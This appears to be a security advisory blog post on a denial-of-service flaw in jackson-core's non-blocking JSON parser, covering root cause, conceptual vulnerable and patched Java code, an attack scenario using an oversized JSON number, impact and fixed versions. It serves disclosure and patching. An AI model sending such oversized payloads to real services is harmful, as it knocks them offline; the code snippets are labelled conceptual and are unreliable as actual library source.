Feb 28, 2026·6 min read·1 visit
The non-blocking Jackson parser ignores `maxNumberLength` constraints, allowing attackers to send arbitrarily long numbers. This causes Denial of Service (DoS) in reactive Java applications via memory and CPU exhaustion.
A significant oversight in the FasterXML jackson-core library's non-blocking (asynchronous) JSON parser allows for the bypass of `StreamReadConstraints`, specifically regarding numeric value lengths. While the standard blocking parser correctly enforces these limits to prevent Denial of Service (DoS) attacks, the async implementation fails to validate the length of incoming integer and floating-point values against the configured maximums. This discrepancy exposes applications using reactive stacks—such as Spring WebFlux, Vert.x, or Micronaut—to resource exhaustion attacks where specially crafted JSON payloads can trigger excessive memory allocation or CPU consumption.
The jackson-core library is the foundation of JSON processing in the Java ecosystem, underpinning virtually all major frameworks including Spring Boot, AWS SDKs, and Spark. In version 2.15.0, FasterXML introduced StreamReadConstraints to proactively mitigate Denial of Service (DoS) vectors. These constraints allow developers to define hard limits on input characteristics, such as the maximum length of a number or string, preventing the parser from attempting to process malicious payloads designed to consume excessive resources.
However, a discrepancy exists in how these constraints are applied across different parsing modes. Jackson supports both blocking I/O (handling InputStream or Reader) and non-blocking I/O (handling byte feeds asynchronously). The vulnerability GHSA-72hv-8253-57qq resides specifically in the non-blocking parser implementation, NonBlockingUtf8JsonParserBase. This component is critical for reactive applications that process JSON data in chunks without blocking threads, a pattern common in modern high-throughput microservices.
Due to this flaw, the non-blocking parser fails to enforce the maxNumberLength constraint. Consequently, while a standard synchronous application would reject a JSON number consisting of one million digits, a reactive application using the vulnerable version of Jackson would attempt to buffer and parse it. This allows an unauthenticated remote attacker to force the application to allocate massive amounts of memory for the TextBuffer or burn CPU cycles attempting to convert the oversized text into a numeric type.
The root cause of this vulnerability lies in the state machine logic of the NonBlockingUtf8JsonParserBase class. Unlike the blocking parser, which reads sequentially from a stream, the non-blocking parser maintains a complex internal state to handle partial data availability. It processes input byte-by-byte, accumulating characters into a TextBuffer when it detects it is inside a JSON number token. The parser transitions through various states (e.g., INT_0, INT_1... FLOAT_EXP) as it validates the numeric format.
When the parser determines that a numeric token has ended (for example, by encountering a delimiter like a comma or closing brace), it finalizes the token. In the corrected blocking implementation, this finalization step includes an explicit check against StreamReadConstraints.maxNumberLength. If the accumulated length in the TextBuffer exceeds the limit (defaulting to 1000 characters), the parser immediately throws a JsonParseException.
In the vulnerable non-blocking implementation, this validation step was omitted during the state transition that finalizes the number. The parser correctly identifies the end of the number and transitions the state to VALUE_NUMBER_INT or VALUE_NUMBER_FLOAT, but it essentially "forgets" to consult the constraints configuration. This oversight permits the TextBuffer to grow unboundedly as long as the input stream continues to provide valid numeric characters, bypassing the safety mechanisms intended to protect the heap.
The fix involves explicitly invoking the validation logic within the async parser's update loop. The patch ensures that before a number is marked as complete, its length is validated against the active StreamReadConstraints.
Vulnerable Logic (Conceptual): In the vulnerable versions (e.g., 2.15.3), the parser would simply return the token without length checks once the number boundary was detected:
// Inside NonBlockingUtf8JsonParserBase
// ... state machine handling ...
if (c == INT_SPACE) {
// End of number detected
_textBuffer.setCurrentLength(_numTypesValid);
return _valueComplete(JsonToken.VALUE_NUMBER_INT);
}Patched Logic:
In the fixed versions (2.15.4, 2.16.2), calls to _streamReadConstraints.validateIntegerLength() are inserted effectively guarding the token finalization:
// Inside NonBlockingUtf8JsonParserBase
// ... state machine handling ...
if (c == INT_SPACE) {
// PATCH: Validate length before finalizing
int len = _textBuffer.size();
_streamReadConstraints.validateIntegerLength(len);
_textBuffer.setCurrentLength(len);
return _valueComplete(JsonToken.VALUE_NUMBER_INT);
}This pattern is repeated for floating-point numbers using validateFPLength(). By injecting this check directly into the state transition, the parser ensures that no numeric token exceeding the configured limit can ever be successfully instantiated or passed to the calling application.
Exploiting this vulnerability requires sending a malformed JSON payload to an endpoint backed by a reactive stack (e.g., Spring WebFlux, Vert.x, or direct Netty usage with Jackson). The attacker does not need authentication if the endpoint is public. The payload consists of a valid JSON structure containing a numeric value with an extreme number of digits.
Attack Scenario:
Transfer-Encoding: chunked or specific framework fingerprints can hint at non-blocking processing.{"data": 12345...} where the number sequence continues for megabytes or gigabytes.Result:
As the number grows, the application's heap usage increases linearly. Eventually, the application encounters an OutOfMemoryError (OOM), causing the JVM to crash or become unresponsive. Alternatively, if the memory is sufficient but the application attempts to convert this token to a BigInteger or BigDecimal, the conversion process (which can be computationally expensive for massive numbers) will spike CPU usage to 100%, causing a thread starvation Denial of Service.
The impact of this vulnerability is strictly Availability. There is no risk to Confidentiality or Integrity, as the attacker cannot read data or modify system state beyond causing a crash. However, in the context of modern microservices, availability is a critical security property. A single unauthenticated request can take down an entire service instance.
Severity Drivers:
The vulnerability is particularly dangerous for "Gateway" services or sidecars that parse JSON bodies before forwarding requests, as these are often the first line of defense and handle high volumes of traffic. The lack of standard CVE assignment at the time of discovery often means this issue slips through standard vulnerability scanners that rely solely on NVD data, making awareness of the GHSA ID critical.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
jackson-core FasterXML | >= 2.15.0, < 2.15.4 | 2.15.4 |
jackson-core FasterXML | >= 2.16.0, < 2.16.2 | 2.16.2 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-770 |
| Attack Vector | Network |
| CVSS Score | 7.5 (High) |
| Impact | Denial of Service (DoS) |
| Affected Component | NonBlockingUtf8JsonParserBase |
| Exploit Status | PoC Available |
Allocation of Resources Without Limits or Throttling